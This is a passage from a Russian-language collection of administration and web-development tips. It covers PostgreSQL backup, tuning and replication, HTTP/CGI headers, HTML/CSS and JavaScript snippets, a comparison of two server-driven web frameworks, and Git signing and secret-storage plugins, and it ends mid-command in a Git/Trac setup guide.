Создаем view: CREATE OR REPLACE VIEW funcsource as SELECT '--\012create or replace function ' || n.nspname::text || '.'::text || p.proname::text || '('::text || oidvectortypes(p.proargtypes) || ')\012'::text || 'returns ' || t.typname || ' as \'\012' || p.prosrc || ' \'\012' || 'language \'' || l.lanname || ' \';\012' as func_source, proname as function, nspname as schema, t.typname as rettype, oidvectortypes(p.proargtypes) as args, l.lanname as language FROM pg_proc p, pg_type t, pg_namespace n, pg_language l WHERE p.prorettype = t.oid AND p.pronamespace = n.oid AND p.prolang = l.oid AND l.lanname <> 'c' AND l.lanname <> 'internal' ; Сохраняем исходные коды функций в файл: psql -Atc "select func_source from funcsource;" > functions.out

Как восстановить template0 в PostgreSQL (доп. ссылка 1) Автор: Олег Бартунов [обсудить]

Восстановление из резервной template1: postgres template1 create database template0 with template template1 update pg_database set datallowconn = false where datname='template0'; vacuum full; vacuum freeze;

Как в PostgreSQL временно отключить тригеры для ускорения закачки БД (доп. ссылка 1) Автор: Олег Бартунов [обсудить]

Выключить: UPDATE "pg_class" SET "reltriggers" = 0 WHERE "relname"='tablename'; Включить: UPDATE pg_class SET reltriggers = ( SELECT count(*) FROM pg_trigger where pg_class.oid = tgrelid) WHERE relname = 'table name';

Как включить помещение в лог всех запросов к PostgreSQL (доп. ссылка 1) Автор: Brainbug [комментарии]

В файле конфигурации PostgreSQL: log_duration = true log_pid = true log_statement = true log_timestamp = true

Как увеличить скорость вставки большого числа INSERT в PostgreSQL [комментарии]

Для увеличения скорости помещения большого числа INSERT запросов (например, дамп в формате pg_dump -D): SET autocommit TO 'off'; строки с INSERT COMMIT; SET autocommit TO 'on'; Или заключить набор INSERT'ов в одну транзакцию: BEGIN; INSERT.... COMMIT; Вместо INSERT лучше использовать "COPY таблица (список полей) FROM stdin;"

Как посмотреть статистику работы PostgreSQL и MySQL [обсудить]

Чем сейчас занимается SQL сервер: MySQL: mysqladmin processlist PostgreSQL: select * from pg_stat_activity; select * from pg_stat_database; Общая статистика по работе сервера: MySQL: mysqladmin extended-status; mysqladmin status PostgreSQL: select * from pg_stats;

Что можно сделать когда VACUUM в PostgreSQL выполняется почти часами и часто падает с deadlock. [комментарии]

Иногда, особенно для интенсивно обновляемых таблиц, начинают сыпаться deadlock'и и VACUUM выполняется нереально долгое время. Часто проблема из-за поврежденного индекса. Решение: REINDEX TABLE таблица; REINDEX INDEX индекс;

Что нужно делать если после отключения по питанию, PostgreSQL не запускается [комментарии]

- Скопируйте содержимое директории pgsql/data - Если postmaster не загрузился - попробуйте удалить файлы rm -f /tmp/.s.PGSQL.* /usr/local/pgsql/data/postmaster.pid и попытаться запустить PostgreSQL. - Если postmaster загрузился, но ни один запрос, включая vacuum, не выполняется, попробуйте использовать утилиту contrib/pg_resetxlog. - После всего выполните полный бэкап базы (pg_dumpall) и vacuumdb --all --full --analyze

Как лучше бэкапить данные баз в PostgreSQL [обсудить]

Полный бэкап всех баз: pg_dumpall [-s] [-D] > backup_file Выборочный бэкап: pg_dump [-s] [-D] [-t table] db > backup_file -s - записывается только информация о структуре базы, без данных. -D - формируется бэкап данных в виде INSERT команд. -t table - бэкап выборочных таблиц.

Как избавиться от deadlock в PostgreSQL ? [обсудить]

Скорее всего вы используйте индексы типа "Hash". Они не очень подходят для баз с множеством параллельных запросов, замените Hash на BTree.

Почему в PosgreSQL 7.2 наблюдается разростание таблиц ? Vacuum analyze запускается каждый день. [комментарии]

В PostgreSQL 7.2 полностью изменился механизм работы VACUUM. Теперь для реальной перестройки содержимого таблицы и реального освобождения пустых блоков необходимо запускать VACUUM FULL ANALYZE. Иначе при интенсивном апдейте, небольшая таблица может превратится в огромного монстра. Во время работы VACUUM FULL - текущая таблица блокируется.

Как использовать индексы для оптимизации запросов по полю типа timestamp [обсудить]

EXPLAIN SELECT num FROM news WHERE enter_date < (now() - '30 days'::interval); По умолчанию используется Seq Scan, несмотря на наличие индекса по enter_date, для использования индекса нужно использовать: EXPLAIN SELECT num FROM news WHERE enter_date < (SELECT now() - '30 days'::interval); или set enable_seqscan to off;

Как в PostgreSQL посмотреть список активных баз и пользователей ? [обсудить]

Список пользователей: select * from pg_shadow; Список баз данных: select * from pg_database; Из командной строки: psql -A -q -t -c "select datname from pg_database" template1 В современных версиях PostgreSQL можно просто набрать: psql -l

Решение проблемы сборки PostgreSQL c --enable-multibyte Автор: Yuri A. Kabaenkov [обсудить]

Если у вас уже установлен postgresql и вы решили добавить поддержку --enable-multibyte, то при компиляции возможно возникнет ошибка и компиляция прекратится. Ошибка связана с функцией pg_encoding_to_char в libpq. (Компилятор лезет за библиотекой в старый libpq) Решение: 1. make clean 2. удалить старые библиотеки постгреса или удалить путь к библиотекам из ldconfig.

Как установить из исходных текстов PostgreSQL [комментарии]

./configure --enable-locale --enable-multibyte=KOI8 --with-perl --enable-unicode-conversion gmake; gmake install adduser postgres su - postgres export LANG=ru_RU.KOI8-R # Убедитесь в том что установлена правильная русская локаль. /usr/local/pgsql/bin/initdb -E KOI8 -D /usr/local/pgsql/data /usr/local/pgsql/bin/postmaster -D /usr/local/pgsql/data >logfile 2>&1 &

Как оптимизировать работу UPDATE и INSERT операций в PostgreSQL [обсудить]

Можно запретить сброс буферов на диск после каждой транзакции: "-o -F" data/postgresql.conf: fsync = off sort_mem = 2048 effective_cache_size=2000

Как увеличить производительность PostgreSQL [обсудить]

1. Запустите postmaster c опциями "-o '-F'" (асинхронная запись, возможна потеря данных при сбое) 2. Почаще выполняйте команду vacuum analyze (pgsql/bin/vacuum --analyze).

Как увеличить максимально возможный размер блока в PostgreSQL [обсудить]

По умолчанию элемент таблицы не может превышать 8Кб. в src/include/config.h измените значение BLCKSZ PS. В PostgreSQL 7.1.x ограничение на размер снято.

Как увеличить количество shared memory для работы высоконагруженного PostgreSQL [комментарии]

В linux: echo 134217728 >/proc/sys/kernel/shmall echo 134217728 >/proc/sys/kernel/shmmax В конфиге ядра FreeBSD: options SYSVSHM options SHMMAXPGS=4096 options SHMMAX="(SHMMAXPGS*PAGE_SIZE+1)" options SHMMIN=2 options SHMMNI=256 options SHMSEG=256 options SYSVSEM options SEMMAP=512 options SEMMNI=512 options SEMMNS=1024 options SEMMNU=512 options SEMMSL=256 options SEMOPM=256 options SEMUME=64 options SYSVMSG options MSGMNB=8192 options MSGMNI=256 options MSGSEG=8192 options MSGSSZ=16 options MSGTQL=128 options NMBCLUSTERS=16786 options NBUF=2048 maxusers 512

Репликация PostgreSQL при помощи londiste из пакета skytools Автор: Pavel Sorokin [комментарии]

Сначала необходимо всё правильно поставить. SkyTools есть в репозиториях постгреса для CentOS, но проблема заключается в том, что в этом пакете не включены дополнительные модули, а именно Pgq_LowLevel. Поэтому сделал следующее: Скачал последнюю версию skytools с сайта https://developer.skype.com/SkypeGarage/DbProjects/SkyTools , сконфигурировал, скомпилировал, и взял оттуда лишь модули для питона Pgq_LowLevel, затем поставил пакет(благо версии пакета в репозитории и модулей совпали) и скопировал модули pgq_lowlevel.so, pgq_triggers.so, logtriga.so в /usr/lib/pgsql/. Всё дальше можно переходить к репликации. Теперь все нижеследующие действия будут проходить от пользователя postgres и только на мастер сервере, но нужно учесть, что на слэйв сервер был доступ для пользователя владеющего базой данных, то есть должна выполняться команда: psql -h slave.server.r -U your_user -d your_database Сначала нам нужно установить pgqadmin. Создаём любой файл следующего содержания [pgqadm] job_name = your_cluster_name db = dbname=your_database_name # how often to run maintenance [seconds] maint_delay = 600 # how often to check for activity [seconds] loop_delay = 0.1 logfile = ~/log/%(job_name)s.log pidfile = ~/pid/%(job_name)s.pid далее мы устанавливаем pgq и создаём очередь. $ pgqadm.py yaour_file install $ pgqadm.py -d your_file ticker $ pgqadm.py your_file create your_queue $ pgqadm.py your_file register your_queue your_consumer теперь когда создана очередь, мы можем начать нашу репликацию. Создаём файл /etc/londiste_your_cluster_name.ini вида: [londiste] job_name = your_cluster_name provider_db = dbname=your_database subscriber_db = dbname=your_database port=5432 host=slave.server.r user=files_testing password=your_password # it will be used as sql ident so no dots/spaces pgq_queue_name = your_queue logfile = /tmp/%(job_name)s.log pidfile = /tmp/%(job_name)s.pid Когда файл создан запускаем londiste londiste.py /etc/londiste_your_cluster_name.ini provider install londiste.py /etc/londiste_your_cluster_name.ini subscriber install Добавляем таблицы для репликации londiste.py /etc/londiste_your_cluster_name.ini provider add table1 table2 table3 londiste.py /etc/londiste_your_cluster_name.ini subscriber add table1 table2 table3 londiste.py -d /etc/londiste_your_cluster_name.ini replay Все !

Web-технологии

CGI на Perl:

CSS и оформление с использованием стилей

HTML

JavaScript

Советы Yahoo по увеличению производительности web-сайтов (доп. ссылка 1) [комментарии]

Производить как можно меньше HTTP запросов;
Воспользоваться услугами сетей доставки контента (Content Delivery Network), например Akamai;
Не пренебрегать HTTP заголовком "Expires" или "Cache-control";
Отдавать страницы в сжатом виде (например, mod_gzip);
Указывать ссылки на файлы с таблицами стилей (link href) в начале документа;
Указывать ссылки на JavaScript файлы (script src) в конце документа;
Не использовать вычислимые выражения (expression) в CSS;
Хранить JavaScript и CSS вставки в виде отдельных файлов;
Уменьшить число обращений к другим доменам на странице (например, когда картинки или iframe грузятся с другого сервера, в идеале не больше 3 доменов);
Минимизировать размер JavaScript и CSS (например, при помощи JSMin или YUI compressor, которые убирают лишние пробелы, комментарии и сокращают переменные);
Избегать редиректов (HTTP Redirect);
Исключить дублирование JavaScript кода (например, IE повторно грузит повторяющиеся "script src" вставки);
Настроить ETags ("FileETag None" в Apache);
Кэшировать Ajax запросы;
Сбрасывать буфер в на начальном этапе генерации страницы (например, через периодический вызов flush() в PHP, для того чтобы клиент получил ссылки на CSS файлы и успел начать их загрузку);
Использовать для Ajax запросов HTTP метод GET (вмещается в 1 TCP пакет, в то время как POST отправляется в два этапа - заголовки и данные);
Выделение контента, который можно загрузить в последнюю очередь (например, отложенная загрузка картинок и JavaScript блоков, после того как загрузится основная часть);
Выделение скриптов, который нужно загрузить в первую очередь;
Уменьшение числа элементов в дереве DOM (минимизация числа HTML тэгов на странице);
Разделение контента по разным доменам: статика через отдельный static.domain.com (браузер будет загружать данные параллельно);
Минимизировать число iframe'ов, не использовать в iframe и script src ссылки на чужие ресурсы (блокирует загрузку остальной части страницы);
Недопускать появление 404 ошибки (страница не найдена);
Уменьшить размер Cookie (убрать лишнее, сократить имена, привязать только к необходимым доменам, определить время жизни);
Для вспомогательных страниц исключить установку Cookie (вынос картинок, CSS и скриптов на static.domain.com);
В JavaScript минимизировать обращения к DOM (очень медленная операция), исключить повторяющиеся запросы к DOM через кэширование;
Оптимизировать обработку событий в JavaScript (вместо "onload" использовать DOMContentLoaded, с осторожностью использовать onresize, провести аудит при помощи утилиты YUI Event);
Загружать CSS через "link" вначале страницы, не использовать @import (в IE он приводит к загрузке CSS в самом конце);
Избегать использования фильтров в CSS, они поддерживаются только в IE, лучше использовать PNG8;
Оптимизировать изображения (минимизация размера палитры, переход на PNG, оптимизация через утилиты pngcrush, optipng или pngoptimizer, удаления комментариев в картинках, оптимизация JPEG через jpegtran);
Оптимизация CSS спрайтов (css sprite) для создания фоновых изображений;
Фактический размер изображения должен совпадать с указанным в параметрах width и height (для того чтобы избежать масштабирования);
favicon.ico должен быть небольшим (менее 1 Кб) и кэшируемым (должен выставляться Expires, 9% всех запросов в Yahoo Search приходится на favicon.ico !);
При использовании Flash нужно определить crossdomain.xml;
Страницы, предназначенные для просмотра на мобильных устройствах, не должны превышать 25Кб (иначе не попадают в кэш iPhone);
Для мобильных устройств можно использовать multipart блоки, когда дополнения к странице (css, картинки) упаковываются в самой странице в виде приложений;

Как явно указать браузеру имя файла, генерируемого CGI скриптом для скачивания. [комментарии]

print "Content-type: application/octet-stream\n"; print "Content-Disposition: attachment; filename=table.dbf\n\n";

Как предложить браузеру сохранить файл выдаваемый CGI-скриптом под именем отличным от текущего CGI. [обсудить]

Для IE нужно выдать заголовок: Content-Disposition: attachment; filename=somefile.jpg

Как организовать в Интернет-магазине перевод денег с кредитных карт ? [комментарии]

Воспользуйтесь системами для проведения авторизации и процессинга платежей, совершаемых при помощи кредитных карт или с лицевых счетов клиентов: http://www.assist.ru/ или http://www.paymentgate.ru/

HTTP коды ошибок 3xx,4xx,5xx [обсудить]

200 OK 201 Created 202 Accepted 203 Provisional Information 204 No Content 300 Multiple Choices 301 Moved Permanently 302 Moved Temporarily 303 Method 304 Not Modified 400 Bad Request - неправильный запрос 401 Authorization Required - ошибка авторизации 402 Payment Required 403 Forbidden - нет доступа 404 Not Found - документ не найден 405 Method Not Allowed 406 None Acceptable 407 Proxy Authentication Required 408 Request Timeout 409 Conflict 410 Gone 500 Internal Server Error - внутренняя ошибка скрипта 501 Not Implemented 502 Bad Gateway 503 Service Unavailable 504 Gateway Timeout

Подсказка по переменным окружения [обсудить]

Языки - HTTP_ACCEPT_LANGUAGE="ru, en" Текущий хост - HTTP_HOST="www.opennet.ru" Браузер пользователя - HTTP_USER_AGENT="Mozilla/4.72 [en] (X11; I; Linux 2.0.36 i586; Nav)" Идентификатор прокси - HTTP_VIA="1.0 proxy.pirat.ru:3128 (Squid/2.2.STABLE5)" Реальный IP до прокси - HTTP_X_FORWARDED_FOR="213.16.124.31" Параметры скрипта - QUERY_STRING="a=5&f=6" IP пользователя или прокси - REMOTE_ADDR="213.16.124.3" Запрошенный документ - REQUEST_URI="/cgi-bin/printenv.cgi?a=5&f=6" Полный путь к скрипту - SCRIPT_FILENAME="/usr/local/apache/cgi-bin/printenv.cgi" Относительный путь к скрипту - SCRIPT_NAME="/cgi-bin/printenv.cgi" Реферер - HTTP_REFERER

Решение проблемы кодирования русских символов в IE [обсудить]

В IE JavaScript функция escape() кодирует в utf8, вместо %XX. Последовательности закодированные в виде %uXXX (utf8) рекомендуется раскодировать посредством модулей Unicode::String и Unicode::Map8. Другим выходом является принудительное кодирование параметров внутри документа средствами JavaScript.

CGI на Perl:

CSS и оформление с использованием стилей

Разделитель страниц при выводе одного большого HTML на печать [комментарии]

Для того чтобы разбить в нужных местах большой HTML документ на страницы и выделить их полоской при просмотре в браузере, которая не будет видна в печатном варианте, можно использовать код: <table style="width: 100%; padding: 0; border: none; border-collapse: collapse;"> <tr><td style="background-color: #B0B0B0; height: 1; padding: 0;" nowrap></td></tr> </table> <br style="page-break-after: always">

Как выделить цветом фон строки текста. [обсудить]

<span style="background-color: #d8d8ff; color: #400000;">test</span> или просто указав стиль в тэге: <li style="background-color: #d8d8ff; color: #400000;">test</li>

Как оформить ветвление структурных деревьев с помощью CSS Автор: Eugene Spearance [обсудить]

blockquote { margin-top: 3px; margin-bottom: 3px; margin-left: 2em; margin-right: 0em; background: #red } В этом случае блок отступит на 3 пикселя сверху и снизу, на 2 символа слева и закрасит фон красным.

Как описать стиль прямо внутри тэга ? [обсудить]

Например: <a href=" style="color: #D00000; text-decoration: none;">

Оформление тега HR с помощью CSS Автор: Eugene Spearance [комментарии]

Цвет можно задать параметром color hr {color: black} Толщину линии height hr {height: 1px}

HTML

Как вставить текст в блок со скроллерами, как textarea, но без автопереноса. [обсудить]

<div style="padding: 8px; border: 1px solid #DDDDDD; background: white; overflow: auto; width: 400px; height: 200px"><pre>текст</pre></div>

Как в HTML сделать однопиксельный разделитель в таблице [обсудить]

Вместо <hr noshade size=1> можно использовать: <tr><td height="1" bgcolor="#8F0000"> <spacer type="block" width="450" height="1"> </td></tr> или еще одно решение: <td height="1" bgcolor="#8F0000" nowrap></td>

Как организовать автоматическое перечитывание страницы через 5 мин. [обсудить]

<meta HTTP-EQUIV="Refresh" CONTENT="300"> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <meta HTTP-EQUIV="Expires" CONTENT="Tue, 04 Mar 2001 07:15:50 GMT">

Что поместить на html страничку чтобы она не кэшировалась [обсудить]

<meta http-equiv="Cache-Control" Content="no-cache"> <meta http-equiv="Pragma" Content="no-cache"> <meta http-equiv="Expires" Content="0">

Отступы в HTML [обсудить]

"MARGINHEIGHT" добавляет пустое поле между верхней границей фрейма и началом текста или графики. Измеряется в пикселах. "MARGINWIDTH" аналогично "MARGINHEIGHT", только применяется к левой границе. Для добавления отступа между таблицами удобно использовать: <table ... style="margin-bottom: 5px;"> или <table ... style="margin-top: 5px;">

Как описать свой сайт и ключевые слова для поисковиков (доп. ссылка 1) Автор: Dima I. Allaverdov [комментарии]

<meta name="description" content="Описание сайта"> <meta name="keywords" http-equiv="keywords" content="ключевое слово1, ключевое слово2...">

Как автоматически перебросить пользователя на другую страницу Автор: Dima I. Allaverdov [комментарии]

Перенаправить через 5 сек: <meta http-equiv="refresh" content="5; url=http://www.test.ru/"> или через JavaScript: window.location = 'http://www.test.ru'; или в cgi: print "Status: 302\n"; print "Location: http://www.test.ru\n\n";

JavaScript

Сравнение методов исключения разработки на JavaScript для веб технологий (доп. ссылка 1) Автор: Still Swamp [комментарии]

Преамбула К статье о публикации фрэймворка Pusa авторы получили полезные для дальнейшей работы над проектом отклики. Наиболее важным нам показалась беседа с создателем проекта Korolev, реализующего аналогичную парадигму но принципиально иными методами. Так как, у нас была возможность не только познакомится с исходным кодом Korolev, но и пообщаться с его создателем, считаем возможным показать принципиальное отличие концепции Pusa, именно на примере Korolev. Задача Оба проекта реализуют разработку web-приложений без необходимости написания клиентского кода JavaScript конечным разработчиком. Решение Korolev Реализация scala. При открытии страница браузер клиента скачивает базовый JavaScript-код приложения. Тот открывает WebSocket-соединение с сервером Korolev. На стороне сервера формируется DOM-структура. Клиентские события направляются через websocket на сервер. Получив очередное событие Korolev выполняет необходимую бизнес логику, вносит изменения в DOM на стороне сервера, далее выполняется построение дифференциального обновления которое направляется на клиент. Благодаря оптимизированному механизму построения дифов, эффективность обработки DOM на стороне Korolev высока. Клиентское приложение получив изменения, отражает их в DOM браузера. Пользователь получает необходимый контент. Решение Pusa Реализация PHP. При старте приложения браузер скачивает базовый JavaScript-код приложения Pusa (6кб). Приложение выполняет AJAX запросы на основе событий браузера. Каждый запрос содержит данные о событийном DOM-элементе и служебную информацию. Сервер Pusa получая очередное событие, определяет и выполняет контроллер с бизнес логикой, и возвращает набор инструкций согласно протоколу Pusa (https://gitlab.com/catlair/pusa/-/blob/main/site/pusa/src/language_ru/man/pusa_protocol.md), как результат AJAX запроса. JavaScript-клиент отрабатывает полученные инструкции, внося изменения в клиентский DOM. Пользователь получает необходимый контент. Общее в концепциях
Клиентские приложения требуют JavaScript как основу работы приложения.
От разработчика не требуется работа над клиентским кодом JavaScript ни в каком виде.
Бизнес логика и работа с DOM выполняется на стороне сервера на имеющихся средствах разработки.
Клиент получает необходимый контент.
Код приложения находится в безопасном серверном окружении и не присутствует на стороне клиента.
Клиентский код JavaScript минималистичен и стабилен.
С разработчика снимается проблема сериализации при передаче данных. Особенности Korolev
Сервер обладает отражением DOM-объекта для каждого клиентского соединения.
Korolev направляет клиенту дифференциальный, хорошо оптимизированный контент.
Korolev использует WebSocket, как основной высокопроизводительный метод взаимодействия.
В силу архитектуры сервер Korolev имеет возможность инициировать изменение клиентского контента. Особенности Pusa
Сервер не требует и не подразумевает хранение состояния клиента, те реализуется чистый REST.
Pusa направляет клиенту команды в ответе AJAX через XMLHttpRequest, что значительно снижает требования к браузеру.
Pusa относится к клиенту как удаленному конечному автомату без обратной связи.
Технология Pusa не имеет возможности инициировать событие со стороны сервера. Инициатором событий является исключительно клиент (таймер возможен). Выводы. Технологии, основывающиеся на необходимости хранения состояния клиента потенциально ограничены ростом клиентских подключений, и как следствие предполагают централизацию аппаратных ресурсов. Возможность инициации событий со стороны сервера является необходимой опцией для внутренних решений. Три перечисленных фактора определяет рынок корпоративных решений, как наиболее привлекательный для технологий, аналогичных Korolev. Качественная оптимизация Korolev явно демонстрируют стремление к минимизации накладных расходов на хранение клиентских состояний, но не устраняет их. Pusa, принципиально следуя парадигме чистого REST, нацелена на рынок открытых решений, со значительным количеством клиентских подключений. Pusa предполагает использование множества независимых инстансов, с минимальными требования, без необходимости их общего взаимодействия. Запросы одного и того же пользователя к Pusa могут обрабатываться различными инстансами в рамках одной сессии, что позволяет использовать решение под значительными нагрузками. Ссылки
Korolev
Pusa
сравнительная схема
Анонс публикации Pusa

Промежуточное хранение JavaScript данных на стороне клиента (доп. ссылка 1) Автор: abava [комментарии]

Для хранения определенного набора данных, привязанных к определенному окну браузера, без задействования ограниченных по размеру cookie, можно использовать JavaScript атрибут "window.name". При этом данные достаточно загрузить один раз (например, инициализировать параметры сессии) и они сохранятся при переходах между страницами. <script type="text/javascript"> window.name = "строка с данными, вмещается даже 100Кб"; </script>

Перекодирование из koi8-r и windows-1251 в unicode на JavaScript [комментарии]

var koi2utf={ 163:1105, 179:1025, 192:1102, 193:1072, 194:1073, 195:1094, 196:1076, 197:1077, 198:1092, 199:1075, 200:1093, 201:1080, 202:1081, 203:1082, 204:1083, 205:1084, 206:1085, 207:1086, 208:1087, 209:1103, 210:1088, 211:1089, 212:1090, 213:1091, 214:1078, 215:1074, 216:1100, 217:1099, 218:1079, 219:1096, 220:1101, 221:1097, 222:1095, 223:1098 }; function koi2unicode (str){ if (str == null){ return null;} var result = ""; var o_code = ""; var i_code = ""; for (var I=0; I < str.length; I++){ i_code = str.charCodeAt(I); if (koi2utf[i_code] != null){ o_code = koi2utf[i_code]; } else if (i_code > 223 && koi2utf[i_code-32] != null){ o_code = koi2utf[i_code-32]-32; } else { o_code = i_code; } result = result + String.fromCharCode(o_code); } return result; } function win2unicode (str){ if (str == null){ return null;} var result = ""; var o_code = ""; var i_code = ""; for (var I=0; I < str.length; I++){ i_code = str.charCodeAt(I); if (i_code == 184){ o_code = 1105; } else if (i_code == 168){ o_code = 1025; } else if (i_code > 191 && i_code < 256){ o_code = i_code + 848; } else { o_code = i_code; } result = result + String.fromCharCode(o_code); } return result; }

Использование хэшей и массивов в JavaScript (доп. ссылка 1) Автор: Дмитрий Котеров [комментарии]

Хэши: var hash = { color: "red", artefact: "pill", actors: { supplier: "Morpheus", consumer: "Neo" } } var hash = new Object(); hash.color = "blue"; hash.element = "pill"; var element1 = hash.element; var element2 = hash['element']; Массивы - это обыкновенные хэши с числовыми ключами, а также ключом length, содержащим их длину. var arr = [100, 200, 300]; for (var k in arr) alert(k + "=>" + arr[k]);

Функция для выборки заданного cookie на JavaScript [обсудить]

function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var endstr = 0; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg){ endstr = document.cookie.indexOf (";", j); if (endstr == -1){ endstr = document.cookie.length; } return unescape(document.cookie.substring(j, endstr)); } i = document.cookie.indexOf(" ", i) + 1; if (i == 0) { break; } } return null; } var cook_uname = GetCookie('uname');

Как инвертировать значения множественных checkbox полей через JavaScript [комментарии]

<form ... name=s> <input type="checkbox" name="i" ....> <a href="#" onClick="Javascript:invert_checkbox('s','i');return false;"> function invert_checkbox (form_name, checkbox_name){ element = document.forms[form_name].elements; for (i=0; i < element.length; i++) { if (element[i].name == checkbox_name){ if(element[i].checked == true) { element[i].checked = false; } else { element[i].checked = true; } } } }

Как выставить Cookie через JavaScript [обсудить]

<script language="JavaScript"> function set_cookie(){ var expiry = new Date(); expiry.setTime(expiry.getTime() + 24*60*60*1000); document.cookie='test1=123; path=/; expires=' + expiry.toGMTString(); document.cookie='test2=456; path=/; expires=' + expiry.toGMTString(); } </script> <body onLoad="set_cookie();">

Как вызвать JavaScript блок из A HREF, вместо ссылки (без перехода и прокрутки в окне) ? [комментарии]

<A HREF="" OnClick="Javascript:test_func();return false;"> "return false" - приводит к неизменности текущей страницы.

Как в JavaScript осуществить сложение числа и строки [комментарии]

<input type="button" value="+" onClick='price_item_3.value=parseInt(price_item_3.value)+1;'> <input type="button" value="-" onClick='if ( price_item_3.value != 0){price_item_3.value=parseInt(price_item_3.value)-1};'>

Как вернуться на предыдущую страницу [комментарии]

<input type="button" name="repeat" value=" BACK " OnClick="history.go(-1);">

Системы контроля версий и управления исходными текстами

Прикрепление к коммиту в Git нескольких цифровых подписей [обсудить]

В некоторых ситуациях может потребоваться добавить к уже существующему коммиту дополнительные цифровые подписи. Например, отдельные подписи могут прикреплять участники, занимавшиеся рецензированием кода, или ответственные за выпуск релизов, подтверждая проверку в своей зоне ответственности. Для добавления подписей можно использовать интерфейс git-notes, позволяющий прикреплять произвольные данные к существующим коммитам. Добавление подписи: git rev-parse HEAD | gpg --sign | base64 -w0 | \ git notes --ref refs/signatures append --file=- git push origin refs/signatures Верификация подписи: git fetch origin refs/signatures git notes merge -s cat_sort_uniq origin/refs/signatures git notes --ref refs/signatures show | \ xargs -L1 -I {} sh -c "echo {} | base64 -d | gpg -d" Для упрощения вышеописанных действий в рамках проекта git-signatures подготовлено дополнение к git, позволяющее привязывать к коммиту или тегу сразу несколько цифровых подписей. Код дополнения написан на bash и требует для своей работы только Git и GnuPG. Получение и объединение подписей из внешнего репозитория: git signatures pull Добавление новой подписи для тега: git signatures add v1.0.0 Передача добавленных локально подписей во внешний репозиторий: git signatures push Выполнение всех вышеописанных действий одним шагом (pull/merge/sign/push): git signatures add --push v1.0.0 Оценка цифровых подписей для тега (вывод всех идентификаторов открытых ключей): git signatures verify v1.0.0 Проверка мультиподписи (m-of-n) (проверка всех подписей в одном GPG trustdb, если 0 - то проверка прошла успешно): git signatures verify --min-count 2 v1.0.0 Проверка мультиподписей в разных GPG trustdb; git signatures verify --trustdb dev-team.db --min-count 2 v1.0.0 git signatures verify --trustdb release-team.db --min-count 1 v1.0.0

Хранение конфиденциальных данных в Git-репозитории (доп. ссылка 1) [комментарии]

В рамках проекта git-secret развивается простой плагин для Git, позволяющий хранить отдельные файлы в репозитории в зашифрованном виде. Например, шифрование может применяться к файлам с паролями, сертификатами и любыми другими конфиденциальными данными, которые не следует разглашать. В отличие от хранения подобных файлов отдельно от Git-репозитория, git-secret позволяет унифицировать обращение с приватной информацией и минимизировать угрозу её случайного добавления в репозиторий в открытом виде (например, периодически всплывают инциденты с размещением в публичных репозиториях файлов с паролями). Git-secret написан на bash и использует GPG для шифрования. Работа организуется через применение команды "git secret reveal", которая расшифровывает все необходимые файлы с использованием персонального закрытого ключа. При коммитах помеченные конфиденциальными файлы будут приниматься только в зашифрованном виде. Начало работы с git-secret (для шифрования в gpg должны быть созданы ключи RSA): Инициализируем репозиторий git-secret (будет создан каталог .gitsecret/): git secret init Добавляем пользователя (name@pgp_email - связанный с RSA-ключами email): git secret tell name@pgp_email Помечаем секретные файлы (после данной операции git_secret не позволит поместить их в репозиторий без шифрования): git secret add имена_файлов Шифруем ранее помеченные файлы: git secret hide Шифрование производится при помощи открытого ключа, ранее переданного командой "git secret tell". Произвольное число разработчиков могут зашифровать файлы, но только владелец закрытого ключа может их расшифровать. Теперь можно выполнять коммит. Чтобы не запускать команду "git secret hide" перед каждым коммитом, её рекомендуется прописать для автоматического вызова на стадии pre-commit. Для расшифровки файлов необходимо выполнить команду: git secret reveal

Связка Git и Trac на Fedora 18 с использованием mod_wsgi Автор: Denis Salmanovich [комментарии]

В статье речь пойдет о том, как связать вместе распределённую систему управления версиями файлов Git и средство управления проектами и отслеживания ошибок в программном обеспечении Trac на Fedora 18 используя mod_wsgi. В более старых версиях Fedora эта связка работала на mod_python. Официально, этот проект умер. Вот и пришлось искать альтернативы. Все следующие действия будут происходить под учетной записью root. Hostname нашей станции: trac-server.loc Установим все необходимые пакеты: yum install httpd git trac trac-git-plugin mod_wsgi firewalld \\ php php-pear php-mysql php-mbstring python Если у нас не установлен DNS сервер, редактируем файл /etc/hosts. Добавим в него имя нашего хоста. 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 trac-server.loc ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 Настроим виртуальный хост апача (/etc/httpd/conf.d/vhosts.conf): ServerName trac-server.loc <VirtualHost *:80> DocumentRoot /var/www/html ServerPath /html ServerName trac-server.loc ServerAlias trac-server.loc ServerAlias www.trac-server.loc </VirtualHost> Включаем поддержку коротких тегов: sed -i 's/^short_open_tag = Off/short_open_tag = On/g' /etc/php.ini Если нужен доступ к ресурсам трэк сервера из-вне, открываем порт в файерволе: firewall-cmd --permanent --add-service=http firewall-cmd --reload Включаем и запускаем apache: systemctl enable httpd systemctl start httpd Создаем директории для нашего трэк сервера и гит репозиторий: install -d /srv/{trac,git} Создадим WSGI скрипт (/srv/trac/trac.wsgi): #!/usr/bin/env python import os def application(environ, start_request): os.environ['TRAC_ENV_PARENT_DIR'] = '/srv/trac' os.environ['PYTHON_EGG_CACHE'] = '/tmp/egg-cache' from trac.web.main import dispatch_request return dispatch_request(environ, start_request) Создадим файл конфигурации (/etc/httpd/conf.d/trac.conf): WSGIScriptAlias /trac /srv/trac/trac.wsgi <Directory /srv/trac> WSGIApplicationGroup %{GLOBAL} Require all granted </Directory> <LocationMatch "/trac/[^/]+/login"> AuthType Digest AuthName "Trac" AuthUserFile /srv/trac/.htpasswd Require valid-user </LocationMatch> Создадим файл конфигурации (/etc/httpd/conf.d/git.conf): SetEnv GIT_PROJECT_ROOT /srv/git SetEnv GIT_HTTP_EXPORT_ALL AliasMatch ^/git/(.*/objects/[0-9a-f]{2}/[0-9a-f]{38})$ /srv/git/$1 AliasMatch ^/git/(.*/objects/pack/pack-[0-9a-f]{40}.(pack|idx))$ /srv/git/$1 ScriptAlias /git/ /usr/libexec/git-core/git-http-backend/ Alias /git /srv/git <Directory /srv/git> Options Indexes FollowSymLinks Multiviews AllowOverride All Require all granted </Directory> <LocationMatch "^/git"> DAV on AuthType Digest AuthName "Git" AuthUserFile /srv/git/.htpasswd Require valid-user </LocationMatch> Создадим файл, который будет содержать пользователей и пароли для доступа к trac серверу. У меня таких файлов два, отдельно для доступа к trac и отдельно для доступа к git репозиториям. htdigest -c 